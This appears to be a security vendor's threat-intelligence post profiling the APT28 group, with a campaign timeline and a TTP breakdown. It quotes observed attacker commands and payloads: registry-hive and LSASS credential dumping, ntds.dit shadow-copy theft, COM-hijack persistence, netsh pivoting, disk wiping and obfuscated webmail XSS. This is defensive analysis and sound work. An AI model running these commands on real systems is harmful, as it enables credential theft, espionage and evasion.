APT28 has established itself as one of the most persistent and adaptable threat groups active today, operating across political, military, and diplomatic landscapes for more than a decade. First observed in 2009, the group quickly moved from small-scale intrusions to high-impact operations. Its major events include compromises of government, NGO, and media organizations; the 2015 disruption of TV5Monde; the 2016 breaches of the DCCC (Democratic Congressional Campaign Committee) and DNC (Democratic National Committee); the targeting of WADA (World Anti Doping Agency) and release of athlete data; activity linked to the Lausanne hotel intrusion affecting CCES (Canadian Centre for Ethics in Sport); the failed 2018 close access attempt against the OPCW (Organisation for the Prohibition of Chemical Weapons); the introduction of the Nearest Neighbor Wi Fi technique in 2022; large scale website compromises across Ukrainian government entities in 2023; and the 2025 appearance of LAMEHUG malware capable of generating commands from text.
Across these operations, APT28 consistently adapts its methods, blending proven tradecraft with new capabilities to match each target environment. The group’s TTPs span the full intrusion lifecycle, involving targeted reconnaissance of Wi-Fi networks, social engineering over secure messaging platforms, and predictive domain registration to build infrastructure in advance. Access vectors combine spearphishing documents, exploitation of webmail vulnerabilities, and proximity-based Wi-Fi attacks. Execution frequently relies on PowerShell, native Windows utilities, and malicious Office macros, while persistence is maintained through logon script manipulation and COM hijacking. Privilege escalation uses vulnerabilities such as CVE-2022-38028, and defense evasion techniques range from steganography and encryption to MOTW bypasses. The group collects data through keylogging, email harvesting, clipboard monitoring, and automated mailbox extraction, and communicates over HTTPS or cloud storage services before exfiltrating stolen information through encrypted uploads.
In this post, we will review APT28’s major historical operations, highlight its significant campaigns across political, governmental, and international organizations, and analyze its tactics, techniques, and procedures to understand how it conducts sustained and multifaceted cyber operations. In the end, we will show how Picus helps defend against this group.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
2009 – Activity attributed to the group began, with targets including military and government entities, non-governmental organizations (NGOs), and journalists [1].
8 April 2015 – The broadcast network of French TV station TV5Monde was compromised and taken off air in a sabotage operation claimed by the "CyberCaliphate," which was assessed to be a false flag operation conducted by the group [1].
March 2016 – A spearphishing campaign was launched targeting personal email accounts of individuals associated with the Hillary Clinton presidential campaign, including the campaign chairman, using shortened links redirecting to spoofed Google login pages.
April 2016 – Networks belonging to the Democratic Congressional Campaign Committee (DCCC) and the Democratic National Committee (DNC) were breached, leading to the exfiltration of thousands of emails and documents [2].
15 June 2016 – The "Guccifer 2.0" online persona was created to claim responsibility for the DNC breach and disseminate stolen documents, falsely presenting the intrusion as the work of a lone hacktivist.
August 2016 – The World Anti-Doping Agency (WADA) was targeted; stolen medical records of athletes were subsequently leaked under the guise of the "Fancy Bears' Hack Team" [1].
September 2016 – An on-site compromise of a Wi-Fi network at a hotel in Lausanne, Switzerland, was used to target a senior official from the Canadian Centre for Ethics in Sport (CCES) and subsequently compromise the CCES network [3].
February 2018 – Ministries of Foreign Affairs in Europe and North America were targeted using a "Jane's 360" defense event lure to deliver the SofacyCarberp payload via malicious Excel macros [4].
April 2018 – An attempted close-access hacking operation targeting the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague was disrupted, leading to the seizure of equipment used to compromise Wi-Fi networks [3].
September 2019 – A broad credential harvesting campaign was initiated against more than 200 organizations, including political campaigns and policy organizations, utilizing brute force and password spray tactics routed through the Tor network [5].
February 2022 – A "Nearest Neighbor" attack vector was employed, where compromised Wi-Fi networks at adjacent organizations were used to gain proximity access to a target’s corporate Wi-Fi network, facilitated by a zero-day privilege escalation vulnerability (CVE-2022-38028) in the Windows Print Spooler service [6].
February 2023 – Reflected cross-site scripting (XSS) vulnerabilities on Ukrainian government websites were exploited to redirect users to phishing pages designed to steal webmail credentials [7].
10 July 2025 – The LAMEHUG malware, which integrates Large Language Model (LLM) capabilities to generate commands based on text descriptions, was deployed against Ukrainian government officials [8].
The following is a comprehensive analysis of the Tactics, Techniques, and Procedures (TTPs) attributed to APT28. This analysis aggregates intelligence observed across multiple campaigns, including the "Nearest Neighbor" attack, campaigns targeting Ukrainian military personnel via Signal, and Operation RoundPress [4][6][9][10].
To discover potential entry vectors into a target network, the adversary deployed a custom PowerShell script on compromised systems belonging to neighboring organizations. This script was utilized to enumerate and examine wireless networks within the range of a dual-homed system's wireless adapter. Through this activity, the Service Set Identifier (SSID) of the intended target's enterprise Wi-Fi network was identified.
In specific campaigns, Ukrainian military administration and command personnel were targeted to identify wounded personnel, associated chains of command, units, and equipment provisioning trails. To facilitate this, the threat actor engaged targets via private chats on the Signal messaging application. By posing as a superior or colleague, the adversary created a false sense of urgency, invoking legal threats or compensation decisions, to pressure victims into performing actions or providing sensitive information.
The adversary registered new domains and populated them with default landing pages, which were reused over the course of a year. These pages contained specific strings, such as "866-593-54352", "522 Clematis. Suite 3000", and "403-965-2341", which allowed for the prediction of C2 domains like cdnverify[.]net prior to their active use. Additionally, specific domains were acquired to support "Operation RoundPress," including:
|
hijx[.]xyz |
Virtual Private Servers (VPS) were utilized to host command and control infrastructure. These servers were hosted by various providers, including GLOBALAXS NOC PARIS, 23VNet Kft, Administrat, Belcloud, M247 Europe SRL, and HOSTGNON LTD.
Legitimate cloud storage services were leveraged to facilitate command and control (C2) operations. Accounts were registered on platforms such as Icedrive and Koofr, including specific accounts like Alan_Smith2304@outlook[.]com and jakub2233@tutamail[.]com. These accounts hosted distinct storage containers for storing malware payloads and depositing exfiltrated data.
Open-source frameworks were modified to suit operational requirements. The Covenant framework, specifically the GruntHTTPStager, was utilized with a custom C2Bridge to allow interaction with the Koofr API.
Additionally, a custom C++ malware named BeardShell was developed to execute PowerShell commands and interact with Icedrive.
For webmail operations, a specialized JavaScript framework named "SpyPress" was created with four variants: SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA.
The open-source tool Luckystrike was assessed to have been used for generating malicious delivery documents. Macros found in delivery documents bore a close resemblance to those generated by Luckystrike.
Access to victim environments was obtained via spearphishing emails that exploited Cross-Site Scripting (XSS) vulnerabilities in public-facing webmail servers. Malicious code was embedded in email headers or directly in the HTML body, triggering execution when the message was viewed.
Phishing emails were sent with subject lines such as "Upcoming Defense events February 2018". The sender address was spoofed to resemble events@ihsmarkit.com, and the email contained a malicious Excel XLS attachment named "Upcoming Events February 2018.xls".
Weaponized Office documents were delivered directly via private Signal chats on the desktop version of the application. These documents mimicked official Ukrainian military forms, such as medical compensation requests, and personnel reports. This method was strategic because Signal Desktop does not implement Mark-of-the-Web (MOTW), preventing the documents from triggering standard Microsoft Office security flags.
The proximity of neighboring organizations was leveraged to connect to a target's corporate Wi-Fi network. By compromising a dual-homed system (connected via both Wi-Fi and wired Ethernet) at a nearby location, the adversary bridged the physical gap and established a connection to the target's wireless network without being on-site. This "Nearest Neighbor" attack later involved re-establishing access via the target's Guest Wi-Fi, which was not fully isolated from the wired corporate network.
PowerShell was used extensively to facilitate the "Nearest Neighbor" attack, compress files, and execute commands.
|
Powershell -c "Get-ChildItem C:\ProgramData\sam.save, C:\ProgramData\security.save, C:\ProgramData\system.save ^ Compress-Archive -DestinationPath C:\Program\Dataout.zip" |
|
1. {}: Creates a new PowerShell session. |
The Windows Command Shell was employed to run native utilities (reg.exe, netsh.exe, cipher.exe) and batch scripts.
|
reg save hklm\sam C:\ProgramData\sam.save |
|
start rundll32.exe "C:\Users\user\AppData\Local\cdnver.dll",#1 |
Weaponized Excel and Word documents contained malicious VBA macros responsible for dropping payloads, establishing persistence, and revealing hidden content.
|
'VBA6 |
|
ActiveSheet.Range("a1:c54").Font.Color = vbBlack |
Malware extensively utilized Windows API functions. VBA macros used CreateProcessW for execution and GetFileAttributesW (aliased as GetImageResolution) to check for file existence.
The BeardShell backdoor leveraged LoadLibrary, GetProcAddress, and GetModuleFileNameW to facilitate execution and DLL proxying.
In the "Operation RoundPress" campaign, injected JavaScript executed within the victim's browser session upon rendering the malicious email.
|
<img src=x onerror=window.parent.eval(atob(...))> |
|
<p title="</noembed><img src=x onerror=...>"> |
|
<a href="..."><script>...</script></a> |
|
Zimbra-Calendar<img/alt="/src='Zimbra-Calendar/onerror=\"window[(function(tmz){ghwa='cxe'; return '\\x65'+decodeURI('%76')+'\\x61\\x6c'})()](window[(function(jvqka){const kqd=decodeURI('%61')+'\t'+decodeURI('%6F')+'\\x62'; oykbg='doix'; return kqd})()](frames[0].document.getElementById('a-cashed-skinLayout2')['\inn\e\r\T\e\xt']))\"> |
Infection relied on victims opening weaponized documents received via Signal or phishing emails. The lack of MOTW on Signal files permitted macros to run without standard security blocks, while Excel documents used white-on-white text to trick users into enabling macros to view content.
Persistence was established by writing the path of a malicious batch file to the HKCU\Environment\UserInitMprLogonScript registry key, ensuring the payload executed upon user login.
A malicious macro registered a new COM server to establish persistence. Using reg.exe, a registry key was added to point to a malicious DLL, ensuring it loaded with explorer.exe at login.
|
reg.exe add HKCU\Software\classes\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\InProcServer32 /d "C:\ProgramData\prnfldr.dll" /f |
The post-compromise tool GooseEgg was utilized to exploit CVE-2022-38028, a vulnerability in the Microsoft Windows Print Spooler service. This activity facilitated privilege escalation on the compromised system.
Multiple obfuscation techniques were employed to conceal operations:
The malicious DLL prnfldr.dll was placed in C:\ProgramData\, mimicking a legitimate library associated with printer folders. The malware proxied exports of the legitimate DLL to maintain standard printing operations and avoid suspicion.
Additionally, archive files created for exfiltration were renamed with innocuous extensions such as .mp4 and .wav to resemble benign media files.
Malware attempted to inject code into running browser processes to handle C2 communications. It searched for processes like firefox.exe, chrome.exe, and iexplore.exe by comparing hashed process names against hardcoded values.
Files and folders created during operations were removed to conceal traces of the intrusion. The native Windows utility Cipher.exe was used to securely overwrite the deleted data, hindering forensic recovery.
|
cmd.exe /c cipher /W:C |
VBA macros included routines to deobfuscate data at runtime by replacing character pairs to reconstruct valid commands.
|
With ActiveDocument.Content.Find |
Additionally, the certutil -decode command was used to transform Base64 encoded text files into executables.
BeardShell performed anti-analysis checks immediately upon thread creation, terminating execution if the host had less than 2 GB of RAM or only one processor.
By delivering malicious documents via Signal Desktop, the Mark-of-the-Web (MOTW) protection was bypassed. Signal does not apply the MOTW identifier to saved files, preventing Microsoft Office from triggering "Protected View" and allowing macros to run.
Malicious macros utilized the GetFileAttributesW function to set file attributes for dropped payloads (e.g., windows.png, prnfldr.dll) to hidden, reducing their visual footprint.
DLL proxying was utilized by the malicious prnfldr.dll, which acted as a proxy for the legitimate DLL. Upon loading, it retrieved addresses of genuine functions from the real library and forwarded calls to them.
A similar technique was observed with the SlimAgent tool proxying eapphost.dll.
The rundll32.exe utility was used to execute the MiniDump function exported by comsvcs.dll to dump the memory of the LSASS process.
Credentials were harvested by exporting sensitive registry hives. The reg.exe utility was used to save the System, Security, and SAM hives to C:\ProgramData for exfiltration.
The Active Directory database (ntds.dit) was targeted for credential access.
|
vssadmin create shadow/for C:/quiet
copy \\?\GLOBALROOT\Device\Harddisk VolumeShadowCopyl Windows\System32\config\SYSTEM [dest] |
SpyPress variants injected hidden HTML input fields into webmail pages to capture password manager autofills or user keystrokes.
Password-spray attacks were conducted against Internet-facing web services to identify valid accounts prior to breaching the network.
Additionally, a Kubernetes cluster was operated to conduct distributed, large-scale password spraying and guessing, often routed through commercial VPN services and TOR.
To facilitate credential harvesting, SpyPress.ROUNDCUBE forced victims to log out by creating an iframe that triggered a logout task. This compelled users to re-enter credentials into the compromised login flow.
|
let frame = get_window_parent_parent().document.createElement("iframe"); |
Malicious macros verified the installation of specific .NET Framework versions by checking for the existence of the directory C:\Windows\Microsoft.NET\Framework\v4.0.30319 to ensure support for subsequent payloads.
Reconnaissance tasks were executed on infected hosts through the Covenant framework. These tasks included using tracert to map network routes, performing ARP scans, and issuing GetNetworkInfo requests.
BeardShell retrieved the current username and workstation name using the Windows API NetWkstaUserGetInfo with parameter 1. This data was used to generate a unique identifier for the infected host.
The Covenant implant enumerated running processes to identify targets of interest or security software.
Additionally, malware hashed process names derived from SystemProcessInformation to identify web browsers for injection.
BeardShell executed the SystemInfo command as its first action. It also combined the local computer name, domain name, username, workstation name, and a hardware profile GUID (via GetCurrentHwProfileW) to create a unique fingerprint hash using the FNV4 algorithm.
Other campaigns collected unique identifiers based on storage volume serial numbers.
To avoid re-infection or detection, VBA macros queried for the existence of specific files, such as %localappdata%/windows.png and %allusersprofile%/prnfldr.dll, terminating if they were found.
SpyPress malware enumerated details about compromised email accounts.
The SlimAgent tool acted as a keylogger, recording keystrokes and encoding special keys in unicode (e.g., [BKSP]). It specifically monitored for potential passwords by triggering screenshots when a buffer of more than 4 characters was followed by an "Enter" press.
Archives of collected data were staged on the target's Outlook Web Access (OWA) server.
Screen capture functionality was implemented by simulating the VK_SCREENSHOT key press, saving the screenshot to the clipboard.
Covenant uploaded PNG screenshots of the desktop, while SlimAgent captured JPEG screenshots every 5 seconds.
SpyPress malware systematically iterated through victim mailboxes to collect messages.
To maintain access to information, SpyPress.ROUNDCUBE created a malicious server-side Sieve rule. This rule forwarded a copy of every incoming email to an attacker-controlled address (e.g., srezoska@skiff[.]com), ensuring collection persisted even if the malicious script stopped running.
After triggering a screenshot key press, malware accessed the clipboard to retrieve the image data and convert it to JPG.
SlimAgent also monitored the clipboard, logging content between black-colored HTML tags to distinguish it from other data.
SpyPress payloads implemented automated data harvesting routines. SpyPress.ROUNDCUBE initiated email exfiltration every 7,200 seconds (2 hours), while SpyPress.ZIMBRA used setInterval to trigger every 14,400 seconds (4 hours).
Data collected from compromised systems, including ntds.dit and registry hives, was compressed into ZIP archives using PowerShell commands or the GUI version of WinRAR. WinRAR were also used to password-protect these archives.
Communication with C2 servers was conducted over HTTPS, with malware configured to ignore invalid security certificates using flags such as SECURITY_FLAG_IGNORE_CERT_DATE_INVALID and SECURITY_FLAG_IGNORE_UNKNOWN_CA.
To pivot from a Guest Wi-Fi network back into the corporate wired network, a series of port-forwards were established using netsh. This allowed access to segmented high-value systems.
|
cmd.exe /C netsh advfirewall firewall add rule name="Remote Event Log Management SMB" $dix=in$ action $I=a11ow$ protocol=tcp localport $t=12345>C:$\Windows\Temp\MSI28122Ac.LOG 2>&1 cmd.exe /C netsh interface portproxy add v4tov4 listenaddress=172.33.xx.xx listenport $t=12345$ connectaddress $s=172.20.xx.$ connectport $=445>c:$\Windows\Temp\MSI2cBfA24.LOG $2>\&1 |
Koofr and Icedrive were utilized as dead-drop resolvers.
SpyPress payloads encoded data sent to the C2 server in Base64. A specific string format was used for credentials, where px denoted password exfiltration.
|
Encoded: bWVAdmljdGltLm9yZyA60iBweAoKbXl1c2VybFtZSBteXBhc3N3b3Jk |
Files transferred to and from C2 storage were encrypted. BeardShell utilized the ChaCha20-Poly1305 algorithm with a 32-byte key, producing a 16-byte authentication tag. Headers and footers were added to masquerade the encrypted data as valid image types (GIF, PNG, JPEG).
Collected system information, screenshots, email bodies, contacts, and credentials were transmitted directly to the C2 server via established HTTPS channels or HTTP POST requests.
Collected data, including keylogs, screenshots, and command outputs, was exfiltrated by uploading files to designated containers on cloud storage services like Icedrive or Koofr. SlimAgent prepared encrypted logs in HTML format, named Desktop_<DD-MM-YYYY_HH-MM-SS>.svc, for this purpose.
We also strongly suggest simulating APT28 Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for APT28:
|
Threat ID |
Threat Name |
Attack Module |
|
43803 |
Sofacy Threat Group Campaign Malware Download Threat |
Network Infiltration |
|
76649 |
Russian Gru Threat Group Campaign |
Windows Endpoint |
|
52129 |
APT28 Threat Group Campaign Malware Email Threat - 3 |
E-mail Infiltration |
|
26499 |
APT28 Threat Group Campaign Malware Download Threat - 3 |
Network Infiltration |
|
32102 |
APT28 Threat Group Campaign |
Windows Endpoint |
|
69336 |
APT28 Threat Group Campaign Backdoor Malware Download Threat |
Network Infiltration |
|
40970 |
APT28 Threat Group Campaign Backdoor Malware Email Threat |
Network Infiltration |
|
55136 |
APT28 Threat Group Campaign RAT Download Threat |
Network Infiltration |
|
87655 |
APT28 Threat Group Campaign RAT Email Threat |
Network Infiltration |
|
96442 |
APT28 Threat Group Campaign Malware Download Threat - 2 |
Network Infiltration |
|
51063 |
APT28 Threat Group Campaign Malware Email Threat - 2 |
Network Infiltration |
|
20220 |
APT28 Threat Group Campaign Malware Downloader Email Threat |
Network Infiltration |
|
43231 |
APT28 Threat Group Campaign Malware Downloader Download Threat |
Network Infiltration |
|
59102 |
APT28 Threat Group Campaign Malware Email Threat - 1 |
Network Infiltration |
|
86199 |
APT28 Threat Group Campaign Malware Download Threat - 1 |
Network Infiltration |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
APT28 is also known as: APT 28, APT-C-20, ATK5, Blue Athena, BlueDelta, FANCY BEAR, FROZENLAKE, Fancy Bear, Fighting Ursa, Forest Blizzard, G0007, Grey-Cloud, Grizzly Steppe, Group 74, Group-4127, GruesomeLarch, IRON TWILIGHT, ITG05, Pawn Storm, SIG40, SNAKEMACKEREL, STRONTIUM, Sednit, Sofacy, Swallowtail, T-APT-12, TA422, TG-4127, Tsar Team, TsarTeam, UAC-0028, Threat Group-4127, ATK 5, TAG-0700, UAC-0063, TAG-110.
[1] “IRON TWILIGHT Supports Active Measures,” Secureworks. Accessed: Dec. 05, 2025. [Online]. Available: https://www.secureworks.com/research/iron-twilight-supports-active-measures
[2] “CrowdStrike’s work with the Democratic National Committee: Setting the record straight,” CrowdStrike.com. Accessed: Dec. 05, 2025. [Online]. Available: https://www.crowdstrike.com/en-us/blog/bears-midst-intrusion-democratic-national-committee/
[3] “U.S. Charges Russian GRU Officers with International Hacking and Related Influence and Disinformation Operations.” Accessed: Dec. 05, 2025. [Online]. Available: https://www.justice.gov/archives/opa/pr/us-charges-russian-gru-officers-international-hacking-and-related-influence-and
[4] B. Lee, M. Harbison, and R. Falcone, “Sofacy Attacks Multiple Government Entities,” Unit 42. Accessed: Dec. 04, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/
[5] T. Burt, “New cyberattacks targeting U.S. elections,” Microsoft On the Issues. Accessed: Dec. 05, 2025. [Online]. Available: https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/
[6] “The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access,” Volexity. Accessed: Dec. 04, 2025. [Online]. Available: https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/
[7] B. Leonard, “Ukraine remains Russia’s biggest cyber focus in 2023,” Google. Accessed: Dec. 05, 2025. [Online]. Available: https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/
[8] V. Simonovich, “Cato CTRLTM Threat Research: Analyzing LAMEHUG – First Known LLM-Powered Malware with Links to APT28 (Fancy Bear),” Cato Networks. Accessed: Dec. 05, 2025. [Online]. Available: https://www.catonetworks.com/blog/cato-ctrl-threat-research-analyzing-lamehug/
[9] G. Amaury, M. Charles, T. D. R. Sekoia, and C. M. A. S. T. Amaury G., “APT28 Operation Phantom Net Voxel,” Sekoia.io Blog. Accessed: Dec. 04, 2025. [Online]. Available: https://blog.sekoia.io/apt28-operation-phantom-net-voxel
[10] M. Faou, “Operation RoundPress.” Accessed: Dec. 05, 2025. [Online]. Available: https://www.welivesecurity.com/en/eset-research/operation-roundpress/